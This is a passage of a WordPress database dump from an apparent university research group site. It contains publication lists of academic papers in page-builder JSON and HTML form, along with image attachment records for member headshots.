Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications (pp. 1-6). IEEE.<\\/p><p>Rosen, A., Levin, B., & Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW) (pp. 631-640). IEEE.<\\/p><p>Tharpe, B., Bourgeois, A. G., & Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services (pp. 505-506).<\\/p><p>Huang, Y., Li, W., Wang, J., Cai, Z., & Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.<\\/p><p>Sidharthan, S., Ashok, A., & Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students (S3) Workshop (pp. 1-2).<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Ye, H., Yang, X., Takac, M., Sunderraman, R., & Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.<\\/p><p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., & Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.<\\/p><p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., & Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence & Computing, Advanced & Trusted Computing, Scalable Computing & Communications, Internet of People and Smart City Innovation (SmartWorld\\/SCALCOM\\/UIC\\/ATC\\/IOP\\/SCI) (pp. 295-302). IEEE.<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., & Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication Systems & NETworkS (COMSNETS) (pp. 19-24). IEEE.<\\/p>\"}}],\"styleRef\":419,\"type\":\"content\"}],\"id\":\"608-c3\",\"parentId\":\"608-c2\",\"partialId\":608,\"styleRef\":418,\"type\":\"content\"}],\"id\":\"608-c2\",\"parentId\":\"608-c1\",\"partialId\":608,\"styleRef\":417,\"type\":\"content\"}],\"id\":\"608-c1\",\"partialId\":608,\"styleRef\":413,\"type\":\"content\"}','','','publish','closed','closed','','612','','','2024-11-07 14:48:27','2024-11-07 19:48:27','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=612',0,'extb_post_json','',0),(613,1,'2022-03-19 12:02:31','2022-03-19 16:02:31','<div data-colibri-id=\"608-c1\" class=\"style-413 style-local-608-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"608-c5\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-417 style-local-608-c5 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"608-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-418 style-local-608-c6 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-419-outer style-local-608-c7-outer\">\n <div data-colibri-id=\"608-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-419 style-local-608-c7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"608-c8\" class=\"h-text h-text-component style-420 style-local-608-c8 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p><strong>2022</strong></p>\n <p>Atkinson, S. F., Kala, A. K., & Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).</p>\n <p><strong>2021</strong></p>\n <p>Northeim, K., Tiwari, C., & Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science & Policy, 126, 48-59.</p>\n <p>Gwalani, H., Tiwari, C., & Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.</p>\n <p>Torres, A. V., Tiwari, C., & Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.</p>\n <p>Northeim, K., Marks, C., & Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.</p>\n <p>Haynes, D., & Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.</p>\n <p>Oppong, J., & Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.</p>\n <p>O’Neill, M., Poole, M., & Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.</p>\n <p>Irany, F. A., Iyer, A., Flores, R. B., & Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.</p>\n <p>Qian, W., Bhowmick, S., O’Neill, M., Ramisetty-Mikler, S., & Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.</p>\n <p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., & Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.</p>\n <p>Huang, Y., Cai, Z., Pang, J., Xie, Z., & Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications\n (pp. 1-6). IEEE.</p>\n <p>Rosen, A., Levin, B., & Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW)\n (pp. 631-640). IEEE.</p>\n <p>Tharpe, B., Bourgeois, A. G., & Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services\n (pp. 505-506).</p>\n <p>Huang, Y., Li, W., Wang, J., Cai, Z., & Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.</p>\n <p>Sidharthan, S., Ashok, A., & Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students\n (S3) Workshop (pp. 1-2).</p>\n <p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n <p>Ye, H., Yang, X., Takac, M., Sunderraman, R., & Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.</p>\n <p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., & Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.</p>\n <p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., & Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence & Computing, Advanced & Trusted\n Computing, Scalable Computing & Communications, Internet of People and Smart City Innovation (SmartWorld/SCALCOM/UIC/ATC/IOP/SCI) (pp. 295-302). IEEE.</p>\n <p>Younis, A. A., Sunderraman, R., Metzler, M., & Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n <p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., & Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication\n Systems & NETworkS (COMSNETS) (pp. 19-24). IEEE.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Publications','','inherit','closed','closed','','608-revision-v1','','','2022-03-19 12:02:31','2022-03-19 16:02:31','',608,'https://gsudice.dataconn.net/?p=613',0,'revision','',0),(619,1,'2023-09-29 11:36:36','2022-03-19 16:03:38',' ','','','publish','closed','closed','','619','','','2023-09-29 11:36:36','2023-09-29 15:36:36','',126,'https://gsudice.dataconn.net/?p=619',3,'nav_menu_item','',0),(628,1,'2022-03-19 12:07:46','2022-03-19 16:07:46','','headshot','','inherit','open','closed','','headshot','','','2022-03-19 12:07:46','2022-03-19 16:07:46','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/headshot.jpg',0,'attachment','image/jpeg',0),(629,1,'2022-03-19 12:08:16','2022-03-19 16:08:16','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-headshot.jpg','cropped-headshot.jpg','','inherit','open','closed','','cropped-headshot-jpg','','','2023-10-03 15:59:54','2023-10-03 19:59:54','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-headshot.jpg',0,'attachment','image/jpeg',0),(630,1,'2022-03-19 12:09:48','2022-03-19 16:09:48','','SRM-360x360','','inherit','open','closed','','srm-360x360','','','2022-03-19 12:09:48','2022-03-19 16:09:48','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/SRM-360x360-1.png',0,'attachment','image/png',0),(689,1,'2022-03-23 10:37:14','2022-03-23 14:37:14','','Armin-Mikler_300x300','','inherit','open','closed','','armin-mikler_300x300','','','2022-03-23 10:37:14','2022-03-23 14:37:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Armin-Mikler_300x300.jpeg',0,'attachment','image/jpeg',0),(690,1,'2022-03-23 10:37:14','2022-03-23 14:37:14','','bourgeois','','inherit','open','closed','','bourgeois','','','2022-03-23 10:37:14','2022-03-23 14:37:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/bourgeois.jpeg',0,'attachment','image/jpeg',0),(692,1,'2022-03-23 10:37:14','2022-03-23 14:37:14','','sunderraman1','','inherit','open','closed','','sunderraman1','','','2022-03-23 10:37:14','2022-03-23 14:37:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg',0,'attachment','image/jpeg',0),(693,1,'2022-03-23 10:37:14','2022-03-23 14:37:14','','Taylor-shelton_300x300','','inherit','open','closed','','taylor-shelton_300x300','','','2022-03-23 10:37:14','2022-03-23 14:37:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Taylor-shelton_300x300.jpeg',0,'attachment','image/jpeg',0),(694,1,'2022-03-23 10:37:14','2022-03-23 14:37:14','','zelikovsky','','inherit','open','closed','','zelikovsky','','','2022-03-23 10:37:14','2022-03-23 14:37:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/zelikovsky.jpeg',0,'attachment','image/jpeg',0),(695,1,'2022-03-23 10:37:32','2022-03-23 14:37:32','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Armin-Mikler_300x300.jpeg','cropped-Armin-Mikler_300x300.jpeg','','inherit','open','closed','','cropped-armin-mikler_300x300-jpeg','','','2022-03-23 10:37:32','2022-03-23 14:37:32','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Armin-Mikler_300x300.jpeg',0,'attachment','image/jpeg',0),(696,1,'2022-03-23 10:40:03','2022-03-23 14:40:03','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg','cropped-bourgeois.jpeg','','inherit','open','closed','','cropped-bourgeois-jpeg','','','2022-03-23 10:40:03','2022-03-23 14:40:03','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg',0,'attachment','image/jpeg',0),(704,1,'2022-03-23 10:58:13','2022-03-23 14:58:13','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg','cropped-zelikovsky.jpeg','','inherit','open','closed','','cropped-zelikovsky-jpeg','','','2022-03-23 10:58:13','2022-03-23 14:58:13','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg',0,'attachment','image/jpeg',0),(705,1,'2022-03-23 10:58:28','2022-03-23 14:58:28','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg','cropped-Taylor-shelton_300x300.jpeg','','inherit','open','closed','','cropped-taylor-shelton_300x300-jpeg','','','2022-03-23 10:58:28','2022-03-23 14:58:28','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg',0,'attachment','image/jpeg',0),(708,1,'2022-03-23 11:21:49','2022-03-23 15:21:49','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Armin-Mikler_300x300-1.jpeg','cropped-cropped-Armin-Mikler_300x300-1.jpeg','','inherit','open','closed','','cropped-cropped-armin-mikler_300x300-1-jpeg','','','2022-03-23 11:21:49','2022-03-23 15:21:49','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Armin-Mikler_300x300-1.jpeg',0,'attachment','image/jpeg',0),(770,1,'2022-03-23 22:38:31','2022-03-24 02:38:31','','Bhavya','','inherit','open','closed','','bhavya','','','2022-03-23 22:38:31','2022-03-24 02:38:31','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Bhavya.jpg',0,'attachment','image/jpeg',0),(771,1,'2022-03-23 22:38:35','2022-03-24 02:38:35','','Reshmanjali','','inherit','open','closed','','reshmanjali','','','2022-03-23 22:38:35','2022-03-24 02:38:35','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Reshmanjali.jpeg',0,'attachment','image/jpeg',0);
INSERT INTO `wp_posts` VALUES (772,1,'2022-03-23 22:38:36','2022-03-24 02:38:36','','Sarah_Akinola','','inherit','open','closed','','sarah_akinola','','','2022-03-23 22:38:36','2022-03-24 02:38:36','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Sarah_Akinola.jpg',0,'attachment','image/jpeg',0),(773,1,'2022-03-23 22:38:39','2022-03-24 02:38:39','','Sundos_Al_Subhi','','inherit','open','closed','','sundos_al_subhi','','','2022-03-23 22:38:39','2022-03-24 02:38:39','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Sundos_Al_Subhi.jpg',0,'attachment','image/jpeg',0),(775,1,'2022-03-23 22:39:29','2022-03-24 02:39:29','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali.jpeg','cropped-Reshmanjali.jpeg','','inherit','open','closed','','cropped-reshmanjali-jpeg','','','2022-03-23 22:39:29','2022-03-24 02:39:29','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali.jpeg',0,'attachment','image/jpeg',0),(776,1,'2022-03-23 22:39:41','2022-03-24 02:39:41','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg','cropped-Bhavya-scaled-1.jpg','','inherit','open','closed','','cropped-bhavya-scaled-1-jpg','','','2022-03-23 22:39:41','2022-03-24 02:39:41','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg',0,'attachment','image/jpeg',0),(777,1,'2022-03-23 22:41:04','2022-03-24 02:41:04','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-1.jpg','cropped-Sarah_Akinola-scaled-1.jpg','','inherit','open','closed','','cropped-sarah_akinola-scaled-1-jpg','','','2022-03-23 22:41:04','2022-03-24 02:41:04','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-1.jpg',0,'attachment','image/jpeg',0),(784,1,'2022-03-23 23:35:14','2022-03-24 03:35:14','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sundos_Al_Subhi-1.jpg','cropped-Sundos_Al_Subhi-1.jpg','','inherit','open','closed','','cropped-sundos_al_subhi-1-jpg','','','2022-03-23 23:35:14','2022-03-24 03:35:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sundos_Al_Subhi-1.jpg',0,'attachment','image/jpeg',0),(793,1,'2022-03-24 22:01:44','2022-03-25 02:01:44','','colibri-image-104.png','','inherit','open','closed','','colibri-image-104-png','','','2022-03-24 22:01:44','2022-03-25 02:01:44','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/colibri-image-104.png',0,'attachment','image/png',0),(794,1,'2022-03-24 22:01:45','2022-03-25 02:01:45','','colibri-image-105.png','','inherit','open','closed','','colibri-image-105-png','','','2022-03-24 22:01:45','2022-03-25 02:01:45','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/colibri-image-105.png',0,'attachment','image/png',0),(795,1,'2022-03-24 22:01:46','2022-03-25 02:01:46','','colibri-image-106.png','','inherit','open','closed','','colibri-image-106-png','','','2022-03-24 22:01:46','2022-03-25 02:01:46','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/colibri-image-106.png',0,'attachment','image/png',0),(796,1,'2022-03-24 22:01:46','2022-03-25 02:01:46','','colibri-image-107.png','','inherit','open','closed','','colibri-image-107-png','','','2022-03-24 22:01:46','2022-03-25 02:01:46','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/colibri-image-107.png',0,'attachment','image/png',0),(810,1,'2022-03-24 22:15:35','2022-03-25 02:15:35','','Anvith','','inherit','open','closed','','anvith','','','2022-03-24 22:15:35','2022-03-25 02:15:35','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Anvith.jpg',0,'attachment','image/jpeg',0),(812,1,'2022-03-24 22:15:39','2022-03-25 02:15:39','','Brindal','','inherit','open','closed','','brindal','','','2022-03-24 22:15:39','2022-03-25 02:15:39','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Brindal.jpeg',0,'attachment','image/jpeg',0),(813,1,'2022-03-24 22:15:40','2022-03-25 02:15:40','','Bronson','','inherit','open','closed','','bronson','','','2022-03-24 22:15:40','2022-03-25 02:15:40','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Bronson.png',0,'attachment','image/png',0),(814,1,'2022-03-24 22:15:44','2022-03-25 02:15:44','','Ruby','','inherit','open','closed','','ruby','','','2022-03-24 22:15:44','2022-03-25 02:15:44','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Ruby.jpg',0,'attachment','image/jpeg',0),(816,1,'2022-03-24 22:17:51','2022-03-25 02:17:51','','Vineeth','','inherit','open','closed','','vineeth','','','2022-03-24 22:17:51','2022-03-25 02:17:51','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Vineeth.jpg',0,'attachment','image/jpeg',0),(817,1,'2022-03-24 22:18:09','2022-03-25 02:18:09','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png','cropped-Bronson.png','','inherit','open','closed','','cropped-bronson-png','','','2022-03-24 22:18:09','2022-03-25 02:18:09','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png',0,'attachment','image/png',0),(819,1,'2022-03-24 22:18:29','2022-03-25 02:18:29','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ruby.jpg','cropped-Ruby.jpg','','inherit','open','closed','','cropped-ruby-jpg','','','2022-03-24 22:18:29','2022-03-25 02:18:29','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ruby.jpg',0,'attachment','image/jpeg',0),(821,1,'2022-03-24 22:19:15','2022-03-25 02:19:15','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','','inherit','open','closed','','cropped-cropped-cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-webp','','','2022-03-24 22:19:15','2022-03-25 02:19:15','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp',0,'attachment','image/webp',0),(830,1,'2022-03-24 22:23:48','2022-03-25 02:23:48','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal.jpeg','cropped-Brindal.jpeg','','inherit','open','closed','','cropped-brindal-jpeg','','','2022-03-24 22:23:48','2022-03-25 02:23:48','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal.jpeg',0,'attachment','image/jpeg',0),(831,1,'2022-03-24 22:24:02','2022-03-25 02:24:02','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg','cropped-Vineeth.jpg','','inherit','open','closed','','cropped-vineeth-jpg','','','2022-03-24 22:24:02','2022-03-25 02:24:02','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg',0,'attachment','image/jpeg',0),(832,1,'2022-03-24 22:24:17','2022-03-25 02:24:17','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','cropped-cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','','inherit','open','closed','','cropped-cropped-cropped-cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-webp','','','2022-03-24 22:24:17','2022-03-25 02:24:17','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp',0,'attachment','image/webp',0),(835,1,'2022-03-24 22:55:45','2022-03-25 02:55:45','','Basit','','inherit','open','closed','','basit','','','2022-03-24 22:57:26','2022-03-25 02:57:26','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Basit.jpg',0,'attachment','image/jpeg',0),(852,1,'2022-03-25 10:15:00','2022-03-25 14:15:00','','ruby_parcells','','inherit','open','closed','','ruby_parcells','','','2022-03-25 10:15:00','2022-03-25 14:15:00','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/ruby_parcells.jpg',0,'attachment','image/jpeg',0),(853,1,'2022-03-25 10:15:13','2022-03-25 14:15:13','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg','cropped-ruby_parcells-scaled-1.jpg','','inherit','open','closed','','cropped-ruby_parcells-scaled-1-jpg','','','2022-03-25 10:15:13','2022-03-25 14:15:13','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg',0,'attachment','image/jpeg',0),(861,1,'2022-03-25 10:51:32','2022-03-25 14:51:32','','Alex','','inherit','open','closed','','alex','','','2022-03-29 21:30:30','2022-03-30 01:30:30','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Alex.jpg',0,'attachment','image/jpeg',0),(862,1,'2022-03-25 10:51:33','2022-03-25 14:51:33','','Ardavan','','inherit','open','closed','','ardavan','','','2022-03-25 10:51:33','2022-03-25 14:51:33','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Ardavan.jpg',0,'attachment','image/jpeg',0),(863,1,'2022-03-25 10:51:38','2022-03-25 14:51:38','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg','cropped-Ardavan.jpg','','inherit','open','closed','','cropped-ardavan-jpg','','','2023-10-13 10:18:15','2023-10-13 14:18:15','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg',0,'attachment','image/jpeg',0),(873,1,'2022-03-25 10:53:29','2022-03-25 14:53:29','','Angelique','','inherit','open','closed','','angelique','','','2022-03-25 10:53:29','2022-03-25 14:53:29','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Angelique.jpg',0,'attachment','image/jpeg',0),(874,1,'2022-03-25 10:53:32','2022-03-25 14:53:32','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg','cropped-Angelique.jpg','','inherit','open','closed','','cropped-angelique-jpg','','','2023-10-13 10:24:42','2023-10-13 14:24:42','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg',0,'attachment','image/jpeg',0),(913,1,'2022-03-29 22:25:54','2022-03-30 02:25:54','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"608-c4\",\"parentId\":\"608-c3\",\"partialId\":608,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"608-c4\",\"index\":0,\"id\":\"608-c5\",\"partialId\":608,\"styleRef\":420,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2022<\\/strong><\\/p><p>Atkinson, S. F., Kala, A. K., & Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).<\\/p><p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah. Individual and Community Level Factors Related to Sanitation, Water Quality, Treatment and Management in Rural Communities in Accra, Ghana: A Field Study Report.<\\/p><p><strong>2021<\\/strong><\\/p><p>Northeim, K., Tiwari, C., & Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science & Policy, 126, 48-59.<\\/p><p>Gwalani, H., Tiwari, C., & Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.<\\/p><p>Torres, A. V., Tiwari, C., & Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.<\\/p><p>Northeim, K., Marks, C., & Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.<\\/p><p>Haynes, D., & Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.<\\/p><p>Oppong, J., & Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.<\\/p><p>O\\u2019Neill, M., Poole, M., & Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.<\\/p><p>Irany, F. A., Iyer, A., Flores, R. B., & Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.<\\/p><p>Qian, W., Bhowmick, S., O\\u2019Neill, M., Ramisetty-Mikler, S., & Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.<\\/p><p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., & Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.<\\/p><p>Huang, Y., Cai, Z., Pang, J., Xie, Z., & Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications (pp. 1-6). IEEE.<\\/p><p>Rosen, A., Levin, B., & Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW) (pp. 631-640). IEEE.<\\/p><p>Tharpe, B., Bourgeois, A. G., & Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services (pp. 505-506).<\\/p><p>Huang, Y., Li, W., Wang, J., Cai, Z., & Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. 